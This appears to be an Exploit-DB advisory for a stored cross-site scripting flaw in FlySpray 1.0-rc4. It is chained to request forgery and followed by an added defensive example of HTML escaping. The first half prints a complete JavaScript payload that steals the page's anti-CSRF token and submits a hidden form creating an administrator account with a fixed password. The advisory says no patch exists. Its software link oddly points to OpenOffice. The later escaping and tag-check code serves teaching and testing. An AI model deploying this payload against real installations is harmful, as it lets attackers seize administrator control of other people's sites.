FlySpray 1.0-rc4 – Cross-Site Scripting / Cross-Site Request Forgery

  • Author: Cyril Vallicari
    Date: 2017-04-25
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/41918/
  • # Exploit Title: XSRF Stored FlySpray 1.0-rc4 (XSS2CSRF add admin account)
    # Date: 19/04/2017
    # Exploit Author: Cyril Vallicari / HTTPCS / ZIWIT
    : https://www.openoffice.org
    # Version: 1.0-rc4
    # Tested on: Windows 7 x64 SP1 / Kali Linux
    
    
    Description :
    
    A vulnerability has been discovered in Flyspray which can be exploited by
    malicious people to conduct cross-site scripting attacks. Input passed via
    the 'real_name' parameter to '/index.php?do=myprofile' is not properly
    sanitised before being returned to the user. This can be exploited to
    execute arbitrary HTML and script code in a user's browser session in the
    context of an affected site.
    
    The script is executed on the profile page AND on any page that allows the
    user to post a comment.
    
    
    This XSS vector allows executing a script that gathers the CSRF token and
    submits a form to create a new admin.
    
    
    Here's the script:
    
    // Read the anti-CSRF token that Flyspray embeds in the current page.
    var tok = document.getElementsByName('csrftoken')[0].value;

    // Build a hidden copy of the admin "new user" form, pre-filled with the
    // new account's details and the token read above.
    var txt = '<form method="POST" id="hacked_form" action="index.php?do=admin&area=newuser">';
    txt += '<input type="hidden" name="action" value="admin.newuser"/>';
    txt += '<input type="hidden" name="do" value="admin"/>';
    txt += '<input type="hidden" name="area" value="newuser"/>';
    txt += '<input type="hidden" name="user_name" value="hacker"/>';
    txt += '<input type="hidden" name="csrftoken" value="' + tok + '"/>';
    txt += '<input type="hidden" name="user_pass" value="12345678"/>';
    txt += '<input type="hidden" name="user_pass2" value="12345678"/>';
    txt += '<input type="hidden" name="real_name" value="root"/>';
    txt += '<input type="hidden" name="email_address" value="root@root.com"/>';
    txt += '<input type="hidden" name="verify_email_address" value="root@root.com"/>';
    txt += '<input type="hidden" name="jabber_id" value=""/>';
    txt += '<input type="hidden" name="notify_type" value="0"/>';
    txt += '<input type="hidden" name="time_zone" value="0"/>';
    txt += '<input type="hidden" name="group_in" value="1"/>';
    txt += '</form>';

    // Insert the form after the menu element and submit it.
    var d1 = document.getElementById('menu');
    d1.insertAdjacentHTML('afterend', txt);
    document.getElementById("hacked_form").submit();
    
    This will create a new admin account, hacker:12345678
    
    PoC video: https://www.youtube.com/watch?v=eCf9a0QpnPs
    
    Patch: No patch yet
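The root cause is that a stored field (real_name) is written back into HTML without output encoding; the CSRF token cannot help, because the injected script runs in the victim's origin and simply reads it. The following is an added example, not Flyspray code, showing a raw concatenation beside its escaped counterpart and a small check that flags tags which did not come from the template (function names and the sample value are constructed for this illustration).

```javascript
// Added example (not Flyspray code): contextual HTML escaping for a
// stored display name such as real_name, next to the vulnerable raw
// concatenation that lets a stored payload become live markup.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

// Escape the five characters that matter in HTML text and quoted attributes.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => HTML_ESCAPES[c]);
}

// Vulnerable: the stored display name is spliced into markup as-is, so
// whatever the user saved in real_name is parsed as part of the document.
function renderCommentUnsafe(realName, body) {
  return `<div class="comment"><b>${realName}</b>: ${body}</div>`;
}

// Hardened: every untrusted value is escaped before concatenation, so the
// browser shows the literal characters instead of treating them as tags.
function renderComment(realName, body) {
  return `<div class="comment"><b>${escapeHtml(realName)}</b>: ${escapeHtml(body)}</div>`;
}

// Review/test helper: does the rendered fragment contain any tag name that
// the template itself did not emit? Useful as a regression assertion.
function containsForeignTag(html, allowedTags) {
  const tags = [...html.matchAll(/<\/?([a-zA-Z][\w-]*)/g)].map((m) => m[1].toLowerCase());
  return tags.some((t) => !allowedTags.includes(t));
}

// Constructed sample: a display name carrying a harmless probe string.
const SAMPLE_NAME = '<script>alert(1)</script>';

// Returns the outcome for both renderers so the contrast can be asserted on.
function demo() {
  return {
    unsafeLeaksTag: containsForeignTag(renderCommentUnsafe(SAMPLE_NAME, 'hello'), ['div', 'b']),
    safeLeaksTag: containsForeignTag(renderComment(SAMPLE_NAME, 'hello'), ['div', 'b']),
  };
}

console.log(demo()); // { unsafeLeaksTag: true, safeLeaksTag: false }
```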